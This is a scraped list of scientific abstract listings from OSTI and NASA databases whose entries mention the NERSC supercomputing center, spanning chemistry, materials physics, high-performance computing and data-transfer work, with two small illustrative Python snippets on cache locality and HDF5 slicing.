    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pluharova, Eva; Baer, Marcel D.; Mundy, Christopher J.

    2014-07-03

    Understanding specific ion effects on proteins remains a considerable challenge. N-methylacetamide serves as a useful proxy for the protein backbone that can be well characterized both experimentally and theoretically. The spectroscopic signatures in the amide I band reflecting the strength of the interaction of alkali cations and alkaline earth dications with the carbonyl group remain difficult to assign and controversial to interpret. Herein, we directly compute the IR shifts corresponding to the binding of either sodium or calcium to aqueous N-methylacetamide using ab initio molecular dynamics simulations. We show that the two cations interact with aqueous N-methylacetamide with different affinities and in different geometries. Since sodium interacts only weakly with the carbonyl group, the resulting amide I band is similar to that of an unperturbed carbonyl group undergoing aqueous solvation. In contrast, the stronger calcium binding results in a clear IR shift with respect to N-methylacetamide in pure water. Support from the Czech Ministry of Education (grant LH12001) is gratefully acknowledged. EP thanks the International Max Planck Research School for support and the Alternative Sponsored Fellowship program at Pacific Northwest National Laboratory (PNNL). PJ acknowledges the Praemium Academiae award from the Academy of Sciences. Calculations of the free energy profiles were made possible through a generous allocation of computer time from the North-German Supercomputing Alliance (HLRN). Calculations of vibrational spectra were performed in part using the computational resources of the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. This work was supported by National Science Foundation grant CHE-0431312. CJM is supported by the U.S. Department of Energy's (DOE) Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences and Biosciences.
    PNNL is operated for the Department of Energy by Battelle. MDB is grateful for the support of the Linus Pauling Distinguished Postdoctoral Fellowship Program at PNNL.

  16. Effect of polar surfaces on organic molecular crystals

    NASA Astrophysics Data System (ADS)

    Sharia, Onise; Tsyshevskiy, Roman; Kuklja, Maija; University of Maryland College Park Team

    Polar oxide materials reveal intriguing opportunities in the fields of electronics, superconductivity, and nanotechnology. While the behavior of polar surfaces has been widely studied for oxide materials and oxide-oxide interfaces, the manifestations and properties of polar surfaces in molecular crystals are still poorly understood. Here we discover that the polar catastrophe phenomenon, known from oxides, also takes place in molecular materials, as illustrated with the example of cyclotetramethylene tetranitramine (HMX) crystals. We show that surface charge separation is a feasible compensation mechanism to counterbalance the macroscopic dipole moment and remove the electrostatic instability. We discuss the role of surface charge in the degradation of polar surfaces, electrical conductivity, optical band-gap closure, and surface metallization. Research is supported by the US ONR (Grants N00014-16-1-2069 and N00014-16-1-2346) and NSF. We used NERSC, XSEDE and MARCC computational resources.

  17. Efficacy of Code Optimization on Cache-Based Processors

    NASA Technical Reports Server (NTRS)

    VanderWijngaart, Rob F.; Saphir, William C.; Chancellor, Marisa K. (Technical Monitor)

    1997-01-01

    In this paper a number of techniques for improving the cache performance of a representative piece of numerical software are presented. Target machines are popular processors from several vendors: MIPS R5000 (SGI Indy), MIPS R8000 (SGI PowerChallenge), MIPS R10000 (SGI Origin), DEC Alpha EV4 + EV5 (Cray T3D & T3E), IBM RS6000 (SP Wide-node), Intel PentiumPro (Ames' Whitney), Sun UltraSparc (NERSC's NOW). The optimizations all attempt to increase the locality of memory accesses, but they meet with rather varied and often counterintuitive success on the different computing platforms. We conclude that it may be genuinely impossible to obtain portable performance on the current generation of cache-based machines. At the least, it appears that the performance of modern commodity processors cannot be described with parameters defining the cache alone.
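The locality idea at the heart of these optimizations can be illustrated with a toy example (NumPy here, as a stand-in for the paper's numerical kernels): the same reduction over a row-major array, walked in two different orders.

```python
import numpy as np

# A minimal sketch of the locality effect the paper studies. Both walks
# compute the same value; on cache-based machines the row-order walk is
# typically much faster because consecutive elements are adjacent in memory.
a = np.arange(2000 * 2000, dtype=np.float64).reshape(2000, 2000)

def sum_by_rows(x):
    s = 0.0
    for i in range(x.shape[0]):   # unit-stride access, cache-friendly
        s += x[i, :].sum()
    return s

def sum_by_cols(x):
    s = 0.0
    for j in range(x.shape[1]):   # large-stride access, cache-unfriendly
        s += x[:, j].sum()
    return s

print(sum_by_rows(a) == sum_by_cols(a))  # identical result either way
```

Timing the two functions on different machines reproduces, in miniature, the paper's point: the payoff of a locality optimization depends strongly on the memory hierarchy underneath.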

  18. GRDC. A Collaborative Framework for Radiological Background and Contextual Data Analysis

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Quiter, Brian J.; Ramakrishnan, Lavanya; Bandstra, Mark S.

    The Radiation Mobile Analysis Platform (RadMAP) is unique in its capability to collect both high-quality radiological data from gamma-ray detectors and fast neutron detectors and a broad array of contextual data that includes positioning and stance data, weather sensor data, and high-resolution 3D data from LiDAR and visual and hyperspectral cameras. The datasets obtained from RadMAP are both voluminous and complex and require analyses from highly diverse communities within both the national laboratory and academic communities. Maintaining a high level of transparency will enable analysis products to further enrich the RadMAP dataset. It is in this spirit of open and collaborative data that the RadMAP team proposed to collect, calibrate, and make available online data from the RadMAP system. The Berkeley Data Cloud (BDC) is a cloud-based data management framework that enables web-based data browsing and visualization, and connects curated datasets to custom workflows such that analysis products can be managed and disseminated while maintaining user access rights. BDC enables cloud-based analyses of large datasets in a manner that simulates real-time data collection, such that BDC can be used to test algorithm performance on real and source-injected datasets. Using the BDC framework, a subset of the RadMAP datasets has been disseminated via the Gamma Ray Data Cloud (GRDC), hosted at the National Energy Research Scientific Computing Center (NERSC), enabling data access for over 40 users at 10 institutions.

  19. Many-Body Perturbation Theory for Understanding Optical Excitations in Organic Molecules and Solids

    NASA Astrophysics Data System (ADS)

    Sharifzadeh, Sahar

    Organic semiconductors are promising as light-weight, flexible, and strongly absorbing materials for next-generation optoelectronics. The advancement of such technologies relies on understanding the fundamental excited-state properties of organic molecules and solids, motivating the development of accurate computational approaches for this purpose. Here, I will present first-principles many-body perturbation theory (MBPT) calculations aimed at understanding the spectroscopic properties of select organic molecules and crystalline semiconductors, and at improving these properties for enhanced photovoltaic performance. We show that for both gas-phase molecules and condensed-phase crystals, MBPT within the GW/BSE approximation provides quantitative agreement with transport gaps extracted from photoemission spectroscopy and conductance measurements, as well as with measured polarization-dependent optical absorption spectra. We discuss the implications of standard approximations within GW/BSE for the accuracy of these results. Additionally, we demonstrate significant exciton binding energies and charge-transfer character in the crystalline systems, which can be controlled through solid-state morphology or a change of conjugation length, suggesting a new strategy for the design of optoelectronic materials. We acknowledge NSF for financial support; NERSC and Boston University for computational resources.

  20. Conformational Dynamics and Proton Relay Positioning in Nickel Catalysts for Hydrogen Production and Oxidation

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Franz, James A.; O'Hagan, Molly J.; Ho, Ming-Hsun

    2013-12-09

    The [Ni(PR2NR'2)2]2+ catalysts (where PR2NR'2 is 1,5-R'-3,7-R-1,5-diaza-3,7-diphosphacyclooctane) are some of the fastest reported for hydrogen production and oxidation; however, chair/boat isomerization and the presence of a fifth solvent ligand have the potential to slow catalysis by incorrectly positioning the pendant amines or blocking the addition of hydrogen. Here, we report the structural dynamics of a series of [Ni(PR2NR'2)2]n+ complexes, characterized by NMR spectroscopy and theoretical modeling. A fast exchange process, which depends on the ligand, was observed for the [Ni(CH3CN)(PR2NR'2)2]2+ complexes. This exchange process was identified to occur through a three-step mechanism: dissociation of the acetonitrile, boat/chair isomerization of each of the four rings defined by the phosphine ligands (including nitrogen inversion), and reassociation of acetonitrile on the opposite side of the complex. The rate of the chair/boat inversion can be influenced by varying the substituent on the nitrogen atom, but the rate of the overall exchange process is at least an order of magnitude faster than the catalytic rate in acetonitrile, demonstrating that the structural dynamics of the [Ni(PR2NR'2)2]2+ complexes do not hinder catalysis. This material is based upon work supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the US Department of Energy, Office of Science, Office of Basic Energy Sciences under FWP56073. Research by J.A.F., M.O., M.-H.H., M.L.H., D.L.D., A.M.A., S.R., and R.M.B. was carried out in the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy, Office of Science. W.J.S. and S.L. were funded by the DOE Office of Science Early Career Research Program through the Office of Basic Energy Sciences. T.L. was supported by the US Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computational resources were provided at the W. R. Wiley Environmental Molecular Sciences Laboratory (EMSL), a national scientific user facility sponsored by the Department of Energy's Office of Biological and Environmental Research located at Pacific Northwest National Laboratory; the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory; and the Jaguar supercomputer at Oak Ridge National Laboratory (INCITE 2008-2011 award supported by the Office of Science of the U.S. DOE under Contract No. DE-AC05-00OR22725).

  1. Ab initio simulations of subatomic resolution images in noncontact atomic force microscopy

    NASA Astrophysics Data System (ADS)

    Kim, Minjung; Chelikowsky, James R.

    2015-03-01

    Direct imaging of polycyclic aromatic molecules with subatomic resolution has recently been achieved with noncontact atomic force microscopy (nc-AFM). Specifically, nc-AFM employing a CO-functionalized tip has provided details of the chemical bonds in aromatic molecules, including the discrimination of bond order. However, the underlying physics of such high-resolution imaging remains poorly understood. By employing new, efficient algorithms based on real-space pseudopotentials, we calculate the forces between the nc-AFM tip and the specimen. We simulate images of planar organic molecules with two different approaches: 1) with a chemically inert tip and 2) with a CO-functionalized tip. We find dramatic differences in the resulting images, which are consistent with recent experimental work. Our work is supported by the DOE under DOE/DE-FG02-06ER46286 and by the Welch Foundation under Grant F-1837. Computational resources were provided by NERSC and XSEDE.

  2. ESnet authentication services and trust federations

    NASA Astrophysics Data System (ADS)

    Muruganantham, Dhivakaran; Helm, Mike; Genovese, Tony

    2005-01-01

    ESnet provides authentication services and trust federation support for SciDAC projects, collaboratories, and other distributed computing applications. The ESnet ATF team operates the DOEGrids Certificate Authority, available to all DOE Office of Science programs, plus several custom CAs, including one for the National Fusion Collaboratory and one for NERSC. The secure hardware and software environment developed to support CAs is suitable for supporting additional custom authentication and authorization applications that your program might require. Seamless, secure interoperation across organizational and international boundaries is vital to collaborative science. We are fostering the development of international PKI federations by founding the TAGPMA, the American regional PMA, and the worldwide IGTF Policy Management Authority (PMA), as well as participating in European and Asian regional PMAs. We are investigating and prototyping distributed authentication technology that will allow us to support the "roaming scientist" (distributed wireless via eduroam), as well as more secure authentication methods (one-time password tokens).

  3. GOCE User Toolbox and Tutorial

    NASA Astrophysics Data System (ADS)

    Knudsen, P.; Benveniste, J.

    2011-07-01

    The GOCE User Toolbox GUT is a compilation of tools for the utilisation and analysis of GOCE Level 2 products. GUT supports applications in geodesy, oceanography, and solid Earth physics. The GUT Tutorial provides information and guidance on how to use the toolbox for a variety of applications. GUT consists of a series of advanced computer routines that carry out the required computations. It may be used on Windows PCs, UNIX/Linux workstations, and Macs. The toolbox is supported by The GUT Algorithm Description and User Guide and The GUT Install Guide. A set of a priori data and models is made available as well. GUT has been developed in a collaboration within the GUT Core Group. The GUT Core Group: S. Dinardo, D. Serpe, B.M. Lucas, R. Floberghagen, A. Horvath (ESA), O. Andersen, M. Herceg (DTU), M.-H. Rio, S. Mulet, G. Larnicol (CLS), J. Johannessen, L. Bertino (NERSC), H. Snaith, P. Challenor (NOC), K. Haines, D. Bretherton (NCEO), C. Hughes (POL), R.J. Bingham (NU), G. Balmino, S. Niemeijer, I. Price, L. Cornejo (S&T), M. Diament, I. Panet (IPGP), C.C. Tscherning (KU), D. Stammer, F. Siegismund (UH), T. Gruber (TUM),

  4. Effective Hamiltonian approach to bright and dark excitons in single-walled carbon nanotubes

    NASA Astrophysics Data System (ADS)

    Choi, Sangkook; Deslippe, Jack; Louie, Steven G.

    2009-03-01

    Recently, excitons in single-walled carbon nanotubes (SWCNTs) have generated great research interest due to the large binding energies and unique screening properties associated with one-dimensional (1D) materials. Considerable progress in their theoretical understanding has been achieved by studies employing the ab initio GW-Bethe-Salpeter equation methodology. For example, the presence of bright and dark excitons with binding energies of a large fraction of an eV has been predicted and subsequently verified by experiment. Some of these results have also been quantitatively reproduced by recent model calculations using a spatially dependent screened Coulomb interaction between the excited electron and hole, an approach that would be useful for studying large diameter and chiral nanotubes with many atoms per unit cell. However, this previous model neglects the degeneracy of the band states and hence the dark excitons. We present an extension of this exciton model for the SWCNT, incorporating the screened Coulomb interaction as well as state degeneracy, to understand and compute the characteristics of the bright and dark excitons, such as the bright and dark level splittings. Supported by NSF #DMR07-05941, DOE #DE-AC02-05CH11231 and computational resources from TeraGrid and NERSC.

  5. Technology for national asset storage systems

    NASA Technical Reports Server (NTRS)

    Coyne, Robert A.; Hulen, Harry; Watson, Richard

    1993-01-01

    An industry-led collaborative project, called the National Storage Laboratory, was organized to investigate technology for storage systems that will be the future repositories for our national information assets. Industry participants are IBM Federal Systems Company, Ampex Recording Systems Corporation, General Atomics DISCOS Division, IBM ADSTAR, Maximum Strategy Corporation, Network Systems Corporation, and Zitel Corporation. Industry members of the collaborative project are funding their own participation. Lawrence Livermore National Laboratory through its National Energy Research Supercomputer Center (NERSC) will participate in the project as the operational site and the provider of applications. The expected result is an evaluation of a high performance storage architecture assembled from commercially available hardware and software, with some software enhancements to meet the project's goals. It is anticipated that the integrated testbed system will represent a significant advance in the technology for distributed storage systems capable of handling gigabyte class files at gigabit-per-second data rates. The National Storage Laboratory was officially launched on 27 May 1992.

  6. Impact of Weak Agostic Interactions in Nickel Electrocatalysts for Hydrogen Oxidation

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Klug, Christina M.; O’Hagan, Molly; Bullock, R. Morris

    To understand how H2 binding and oxidation are influenced in [Ni(PR2NR'2)2]2+ catalysts with H2 binding energies close to thermoneutral, two [Ni(PPh2NR'2)2]2+ (R' = Me or C14H29) complexes with phenyl substituents on phosphorus and varying alkyl chain lengths on the pendant amine were studied. In the solid state, [Ni(PPh2NMe2)2]2+ exhibits an anagostic interaction between the Ni(II) center and the α-CH3 of the pendant amine, and DFT and variable-temperature 31P NMR experiments suggest that the anagostic interaction persists in solution. The equilibrium constants for H2 addition to these complexes were measured by 31P NMR spectroscopy, affording free energies of H2 addition (ΔG°H2) of –0.8 kcal mol–1 in benzonitrile and –1.6 to –2.3 kcal mol–1 in THF. The anagostic interaction contributes to the low driving force for H2 binding by stabilizing the four-coordinate Ni(II) species prior to binding of H2. The pseudo-first-order rate constants for H2 addition at 1 atm were measured by variable-scan-rate cyclic voltammetry and were found to be similar for both complexes: less than 0.2 s–1 in benzonitrile and 3–6 s–1 in THF. In the presence of exogenous base and H2, turnover frequencies of electrocatalytic H2 oxidation were measured to be less than 0.2 s–1 in benzonitrile and 4–9 s–1 in THF. These complexes are slower electrocatalysts for H2 oxidation than previously studied [Ni(PR2NR'2)2]2+ complexes due to a competition between H2 binding and formation of the anagostic interaction. However, the decrease in catalytic rate is accompanied by a beneficial 130 mV decrease in overpotential. This research was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (DOE), Office of Science, Office of Basic Energy Sciences. Computational resources were provided at the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory.
    Mass spectrometry experiments were performed in the William R. Wiley Environmental Molecular Sciences Laboratory, a DOE national scientific user facility sponsored by the DOE's Office of Biological and Environmental Research and located at Pacific Northwest National Laboratory (PNNL). The authors thank Dr. Rosalie Chu for the mass spectrometry analysis. PNNL is operated by Battelle for DOE.
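Free energies like those quoted above follow from measured equilibrium constants via the standard relation ΔG° = −RT ln K. A minimal numeric sketch (the K value is illustrative, not a number from the paper):

```python
import math

R = 1.987204e-3   # gas constant, kcal mol^-1 K^-1
T = 298.15        # temperature, K

def delta_g(K, temperature=T):
    """Standard free energy change (kcal/mol) from an equilibrium constant."""
    return -R * temperature * math.log(K)

# An equilibrium constant near 1 gives dG near 0 kcal/mol, i.e. the
# near-thermoneutral H2-binding regime discussed for these complexes.
print(f"K = 4  ->  dG = {delta_g(4.0):+.2f} kcal/mol")
```

The relation also shows why small free-energy differences matter: each factor of ~5 in K at room temperature shifts ΔG° by only about 1 kcal/mol.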

  7. DOE Centers of Excellence Performance Portability Meeting

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Neely, J. R.

    2016-04-21

    Performance portability is a phrase often used, but not well understood. The DOE is deploying systems at all of the major facilities across ASCR and ASC that are forcing application developers to confront head-on the challenges of running applications across these diverse systems. With GPU-based systems at the OLCF and LLNL, and Phi-based systems landing at NERSC, ACES (LANL/SNL), and the ALCF, the issue of performance portability is confronting the DOE mission like never before. A new best practice in the DOE is to include "Centers of Excellence" with each major procurement, with a goal of focusing efforts on preparing key applications to be ready for the systems coming to each site, and engaging the vendors directly in a "shared fate" approach to ensuring success. While each COE is necessarily focused on a particular deployment, applications almost invariably must be able to run effectively across the entire DOE HPC ecosystem. This tension between optimizing performance for a particular platform, while still being able to run with acceptable performance wherever the resources are available, is the crux of the challenge we call "performance portability". This meeting was an opportunity to bring application developers, software providers, and vendors together to discuss this challenge and begin to chart a path forward.

  8. ArrayBridge: Interweaving declarative array processing with high-performance computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Xing, Haoyuan; Floratos, Sofoklis; Blanas, Spyros

    Scientists are increasingly turning to datacenter-scale computers to produce and analyze massive arrays. Despite decades of database research that extols the virtues of declarative query processing, scientists still write, debug, and parallelize imperative HPC kernels even for the most mundane queries. This impedance mismatch has been partly attributed to the cumbersome data loading process; in response, the database community has proposed in situ mechanisms to access data in scientific file formats. Scientists, however, desire more than a passive access method that reads arrays from files. This paper describes ArrayBridge, a bi-directional array view mechanism for scientific file formats that aims to make declarative array manipulations interoperable with imperative file-centric analyses. Our prototype implementation of ArrayBridge uses HDF5 as the underlying array storage library and seamlessly integrates into the SciDB open-source array database system. In addition to fast querying over external array objects, ArrayBridge produces arrays in the HDF5 file format just as easily as it can read from it. ArrayBridge also supports time travel queries from imperative kernels through the unmodified HDF5 API, and automatically deduplicates between array versions for space efficiency. Our extensive performance evaluation at NERSC, a large-scale scientific computing facility, shows that ArrayBridge exhibits statistically indistinguishable performance and I/O scalability relative to the native SciDB storage engine.
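The in situ idea underlying ArrayBridge can be illustrated with a small h5py sketch. This is only a stand-in: ArrayBridge itself works through the HDF5 C API inside SciDB, and the file and dataset names below are invented for the example.

```python
import os
import tempfile
import numpy as np
import h5py

# An HDF5 dataset can be sliced in place, so a query engine can read just
# the block it needs instead of bulk-loading the whole array.
path = os.path.join(tempfile.mkdtemp(), "demo.h5")

with h5py.File(path, "w") as f:
    f.create_dataset("grid", data=np.arange(100).reshape(10, 10))

with h5py.File(path, "r") as f:
    block = f["grid"][2:4, 0:3]   # only this block is read from disk

print(block.tolist())
```

The same dataset remains readable by any imperative HDF5 kernel, which is the interoperability ArrayBridge is after.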

  9. Excitonic Effects and Optical Absorption Spectrum of Doped Graphene

    NASA Astrophysics Data System (ADS)

    Jornada, Felipe; Deslippe, Jack; Louie, Steven

    2012-02-01

    First-principles calculations based on the GW-Bethe-Salpeter Equation (GW-BSE) approach and subsequent experiments have shown large excitonic effects in the optical absorbance of graphene. Here we employ the GW-BSE formalism to probe the effects of charge-carrier doping and of an external electric field on the absorption spectrum of graphene. We show that the absorbance peak due to the resonant exciton exhibits systematic changes in both its position and profile when graphene is gate-doped by carriers, in excellent agreement with very recent measurements (Tony F. Heinz, private communication). We analyze the various contributions to these changes in the absorption spectrum, such as the effects of screening by carriers on the quasiparticle energies and electron-hole interactions. This work was supported by National Science Foundation Grant No. DMR10-1006184, the U.S. Department of Energy under Contract No. DE-AC02-05CH11231, and the U.S. DOD - Office of Naval Research under RTC Grant No. N00014-09-1-1066. Computer time was provided by NERSC.

  10. Electronic and Optical Properties of Novel Phases of Silicon and Silicon-Based Derivatives

    NASA Astrophysics Data System (ADS)

    Ong, Chin Shen; Choi, Sangkook; Louie, Steven

    2014-03-01

    The vast majority of solar cells on the market today are made from crystalline silicon in the diamond-cubic phase. Nonetheless, diamond-cubic Si has an intrinsic disadvantage: it has an indirect band gap with a large energy difference between the direct gap and the indirect gap. In this work, we perform a careful study of the electronic and optical properties of a newly discovered cubic-Si20 phase of Si that is found to have a direct band gap. In addition, other silicon-based derivatives have also been discovered and found to be thermodynamically metastable. We carry out ab initio GW and GW-BSE calculations for the quasiparticle excitations and optical spectra, respectively, of these new phases of silicon and silicon-based derivatives. This work was supported by NSF grant No. DMR10-1006184 and U.S. DOE under Contract No. DE-AC02-05CH11231. Computational resources have been provided by DOE at Lawrence Berkeley National Laboratory's NERSC facility and by the NSF through XSEDE resources at NICS.

  11. Towards real-time detection and tracking of spatio-temporal features: Blob-filaments in fusion plasma

    DOE PAGES

    Wu, Lingfei; Wu, Kesheng; Sim, Alex; ...

    2016-06-01

    A novel algorithm and implementation for real-time identification and tracking of blob-filaments in fusion reactor data is presented. Similar spatio-temporal features are important in many other applications, for example, ignition kernels in combustion and tumor cells in medical imaging. This work presents an approach for extracting these features by dividing the overall task into three steps: local identification of feature cells, grouping feature cells into extended features, and tracking the movement of features through overlap in space. Through our extensive work in parallelization, we demonstrate that this approach can effectively make use of a large number of compute nodes to detect and track blob-filaments in real time in fusion plasma. Here, on a set of 30 GB of fusion simulation data, we observed linear speedup on 1024 processes and completed blob detection in less than three milliseconds using Edison, a Cray XC30 system at NERSC.
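    The three-step decomposition above (flag feature cells, group them into blobs, track blobs by spatial overlap) can be sketched on a single node with off-the-shelf connected-component labeling. This is a minimal illustration under invented toy data and thresholds, not the paper's parallel implementation:

    ```python
    import numpy as np
    from scipy import ndimage

    def detect_blobs(frame, threshold):
        """Steps 1-2: flag cells above threshold, group connected cells into blobs."""
        mask = frame > threshold
        labels, n_blobs = ndimage.label(mask)   # connected-component grouping
        return labels, n_blobs

    def track_blobs(labels_prev, labels_curr):
        """Step 3: match blobs across frames by spatial overlap of their cells."""
        matches = {}
        for blob_id in range(1, labels_curr.max() + 1):
            overlap = labels_prev[labels_curr == blob_id]
            overlap = overlap[overlap > 0]
            if overlap.size:
                # inherit the identity of the previous blob with the largest overlap
                matches[blob_id] = int(np.bincount(overlap).argmax())
        return matches

    # Two toy 2D "density" frames: one blob drifting one cell to the right.
    f0 = np.zeros((8, 8))
    f0[2:4, 2:4] = 1.0
    f1 = np.zeros((8, 8))
    f1[2:4, 3:5] = 1.0
    l0, n0 = detect_blobs(f0, 0.5)
    l1, n1 = detect_blobs(f1, 0.5)
    print(n0, n1, track_blobs(l0, l1))   # → 1 1 {1: 1}
    ```

    The real pipeline distributes frames and grid partitions across MPI ranks; the overlap-matching idea is the same.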

  12. High Performance Data Transfer for Distributed Data Intensive Sciences

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fang, Chin; Cottrell, R 'Les' A.; Hanushevsky, Andrew B.

    We report on the development of ZX, software providing high-performance data transfer and encryption. The design scales in computation power, network interfaces, and IOPS while carefully balancing the available resources. Two U.S. patent-pending algorithms help tackle data sets containing many small files as well as very large files, and provide insensitivity to network latency. It has a cluster-oriented architecture, using peer-to-peer technologies to ease deployment, operation, usage, and resource discovery. Its unique optimizations enable effective use of flash memory. Using a pair of existing data transfer nodes at SLAC and NERSC, we compared its performance to that of bbcp and GridFTP and determined that they were comparable. With a proof of concept created using two four-node clusters with multiple distributed multi-core CPUs, network interfaces, and flash memory, we achieved 155 Gbps memory-to-memory over a 2x100 Gbps link-aggregated channel and 70 Gbps file-to-file with encryption over a 5000-mile 100 Gbps link.

  13. Connecting Restricted, High-Availability, or Low-Latency Resources to a Seamless Global Pool for CMS

    NASA Astrophysics Data System (ADS)

    Balcas, J.; Bockelman, B.; Hufnagel, D.; Hurtado Anampa, K.; Jayatilaka, B.; Khan, F.; Larson, K.; Letts, J.; Mascheroni, M.; Mohapatra, A.; Marra Da Silva, J.; Mason, D.; Perez-Calero Yzquierdo, A.; Piperov, S.; Tiradani, A.; Verguilov, V.; CMS Collaboration

    2017-10-01

    The connection of diverse and sometimes non-Grid-enabled resource types to the CMS Global Pool, which is based on HTCondor and glideinWMS, has been a major goal of CMS. These resources range in type from a high-availability, low-latency facility at CERN for urgent calibration studies, called the CAF, to a local user facility at the Fermilab LPC, allocation-based computing resources at NERSC and SDSC, opportunistic resources provided through the Open Science Grid, commercial clouds, and others, as well as access to opportunistic cycles on the CMS High Level Trigger farm. In addition, we have provided the capability to give priority to local users of resources at CMS sites beyond those pledged to the WLCG. Many of the solutions employed to bring these diverse resource types into the Global Pool have common elements, while some are very specific to a particular project. This paper details some of the strategies and solutions used to access these resources through the Global Pool in a seamless manner.

  14. DESCQA: Synthetic Sky Catalog Validation Framework

    NASA Astrophysics Data System (ADS)

    Mao, Yao-Yuan; Uram, Thomas D.; Zhou, Rongpu; Kovacs, Eve; Ricker, Paul M.; Kalmbach, J. Bryce; Padilla, Nelson; Lanusse, François; Zu, Ying; Tenneti, Ananth; Vikraman, Vinu; DeRose, Joseph

    2018-04-01

    The DESCQA framework provides rigorous validation protocols for assessing the quality of simulated sky catalogs in a straightforward and comprehensive way. DESCQA enables the inspection, validation, and comparison of an inhomogeneous set of synthetic catalogs via a common interface within an automated framework. An interactive web interface is also available at portal.nersc.gov/project/lsst/descqa.

  15. Crosscut report: Exascale Requirements Reviews, March 9–10, 2017 – Tysons Corner, Virginia. An Office of Science review sponsored by: Advanced Scientific Computing Research, Basic Energy Sciences, Biological and Environmental Research, Fusion Energy Sciences, High Energy Physics, Nuclear Physics

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gerber, Richard; Hack, James; Riley, Katherine

    The mission of the U.S. Department of Energy Office of Science (DOE SC) is the delivery of scientific discoveries and major scientific tools to transform our understanding of nature and to advance the energy, economic, and national security missions of the United States. Achieving these goals in today's world requires investments not only in the traditional scientific endeavors of theory and experiment, but also in computational science and the facilities that support large-scale simulation and data analysis. The Advanced Scientific Computing Research (ASCR) program addresses these challenges in the Office of Science. ASCR's mission is to discover, develop, and deploy computational and networking capabilities to analyze, model, simulate, and predict complex phenomena important to DOE. ASCR supports research in computational science, three high-performance computing (HPC) facilities — the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory and Leadership Computing Facilities at Argonne (ALCF) and Oak Ridge (OLCF) National Laboratories — and the Energy Sciences Network (ESnet) at Berkeley Lab. ASCR is guided by science needs as it develops research programs, computers, and networks at the leading edge of technologies. As we approach the era of exascale computing, technology changes are creating challenges for Office of Science programs whose researchers need to use high-performance computing and data systems effectively. Numerous significant modifications to today's tools and techniques will be needed to realize the full potential of emerging computing systems and other novel computing architectures. To assess these needs and challenges, ASCR held a series of Exascale Requirements Reviews in 2015–2017, one with each of the six SC program offices, and a subsequent Crosscut Review that sought to integrate the findings from each. 
Participants at the reviews were drawn from the communities of leading domain scientists, experts in computer science and applied mathematics, ASCR facility staff, and DOE program managers in ASCR and the respective program offices. The purpose of these reviews was to identify mission-critical scientific problems within the DOE Office of Science (including experimental facilities) and to determine the requirements for the exascale ecosystem needed to address those challenges. The exascale ecosystem includes exascale computing systems, high-end data capabilities, efficient software at scale, libraries, tools, and other capabilities. This effort will contribute to the development of a strategic roadmap for ASCR compute and data facility investments and will help the ASCR Facility Division establish partnerships with Office of Science stakeholders. It will also inform the Office of Science research needs and agenda. The results of the six reviews have been published in reports available on the web at http://exascaleage.org/. This report presents a summary of the individual reports and of common and crosscutting findings, and it identifies opportunities for productive collaborations among the DOE SC program offices.

  16. Enabling Efficient Climate Science Workflows in High Performance Computing Environments

    NASA Astrophysics Data System (ADS)

    Krishnan, H.; Byna, S.; Wehner, M. F.; Gu, J.; O'Brien, T. A.; Loring, B.; Stone, D. A.; Collins, W.; Prabhat, M.; Liu, Y.; Johnson, J. N.; Paciorek, C. J.

    2015-12-01

    A typical climate science workflow often involves a combination of data acquisition, modeling, simulation, analysis, visualization, publishing, and storage of results. Each of these tasks presents a myriad of challenges when running in a high performance computing environment such as Hopper or Edison at NERSC. Hurdles such as data transfer and management, job scheduling, parallel analysis routines, and publication require considerable forethought and planning to ensure that proper quality-control mechanisms are in place. These steps require effectively utilizing a combination of well-tested and newly developed functionality to move data, perform analysis, apply statistical routines, and finally, serve results and tools to the greater scientific community. As part of the CAlibrated and Systematic Characterization, Attribution and Detection of Extremes (CASCADE) project, we highlight a stack of tools our team utilizes and has developed to make large-scale simulation and analysis work commonplace, providing operations that assist in everything from generation/procurement of data (HTAR/Globus) to automated publication of results to portals like the Earth System Grid Federation (ESGF), while executing everything in between in a scalable, task-parallel way (MPI). We highlight the use and benefit of these tools through several climate science analysis use cases to which they have been applied.

  17. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Churchill, R. Michael

    Apache Spark is explored as a tool for analyzing large data sets from the magnetic fusion simulation code XGC1. Implementation details of Apache Spark on the NERSC Edison supercomputer are discussed, including binary file reading and parameter setup. Here, an unsupervised machine learning algorithm, k-means clustering, is applied to XGC1 particle distribution function data, showing that highly turbulent spatial regions do not have common coherent structures, but rather broad, ring-like structures in velocity space.
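    The clustering step itself is standard k-means (Lloyd's algorithm); the study runs it at scale through Spark, but a minimal NumPy sketch on invented toy data conveys the idea (the real input would be sampled particle distribution functions, not two Gaussian blobs):

    ```python
    import numpy as np

    def kmeans(X, centers, iters=50):
        """Plain Lloyd's-algorithm k-means; Spark's MLlib runs the same iteration at scale."""
        centers = centers.astype(float).copy()
        for _ in range(iters):
            # assign each sample to its nearest center
            d = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=2)
            labels = d.argmin(axis=1)
            # move each center to the mean of its assigned samples
            centers = np.array([X[labels == j].mean(axis=0) for j in range(len(centers))])
        return labels, centers

    # Toy stand-in for velocity-space samples: two well-separated clusters.
    rng = np.random.default_rng(1)
    X = np.vstack([rng.normal(0.0, 0.3, (50, 2)), rng.normal(3.0, 0.3, (50, 2))])
    labels, _ = kmeans(X, centers=X[[0, -1]])   # seed one center in each cluster
    print(np.bincount(labels).tolist())          # → [50, 50]
    ```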

  18. Mechanisms of selective cleavage of C–O bonds in di-aryl ethers in aqueous phase

    DOE Office of Scientific and Technical Information (OSTI.GOV)

